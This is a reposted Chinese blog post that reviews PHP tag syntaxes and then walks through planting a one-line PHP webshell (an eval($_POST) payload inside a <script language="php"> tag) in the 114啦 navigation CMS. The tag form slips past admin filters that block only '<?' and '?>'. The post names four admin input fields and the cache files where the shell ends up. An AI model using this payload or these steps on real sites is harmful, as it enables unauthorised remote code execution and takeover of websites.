首先介紹下php的各種標簽：
1)：
<?php ?>
demo:
<?php echo "test";?>
這個標簽現(xiàn)在程序大多都是使用的這種標簽！大家都不陌生了，這里就不多介紹了！
2)：
<? echo "test"; ?>
這種標簽是在以前很普遍的一種用法php 老版本開發(fā)的cms大多都是用的它，
大多程序員都是很熟悉的！我們把這種標簽稱為短語標簽！
3）：
<script language="php"> </script>
demo:
<script language="php">echo "test";</script>
這個標簽是今天的重點，大多都不熟悉的！而且程序員在網(wǎng)站后臺過濾插一句話
的時候往往都是以
“<?,?>”
這兩個關鍵字進行替換或過濾的！所以這種標簽在后臺插馬
的時候用處還是很大的！PS：就是應為使用量不大，就不重視！這樣能行嗎？
實戰(zhàn)：114啦導航準備我們的一句話代碼：利用script的標簽代碼:
<script language="php">eval ($_POST[1]);</script>
首先后臺我跟晴天那家伙已經(jīng)看完了。他自己的方法也沒拿下shell模版目錄權(quán)限是只讀！你們懂的！
這里的方法就是利用緩存拿shell.這個方法是以前公布出來的。作者具體就不知道是誰了（轉(zhuǎn)載亂了）
–官方以及把這里修補了，但是修補方法很馬虎！就是我之前說的過濾關鍵字只有
<? ?>
所以這里我們可以利用 我們準備好的script格式的php一句話代碼插入！
名站首行：
HTML內(nèi)輸入一句話，提交后一句話木馬位于admin/data/cache/cache_mztop.php
名站輪播：
站點網(wǎng)址后輸入一句話，提交后一句話木馬位于admin/data/cache/cache_famous_loop.php
名站切換：
ifreme網(wǎng)址后輸入一句話，提交后一句話木馬位于admin/data/cache/cache_famous_tab.php
首頁實用工具：
工具網(wǎng)址后輸入一句話，提交后一句話木馬位于admin/data/cache/cache_index_tool.php
本文來源于：半坑土農(nóng)民'S Blog

香港服務器租用

版權(quán)聲明：本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務器上建立鏡像，否則將依法追究法律責任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學習參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。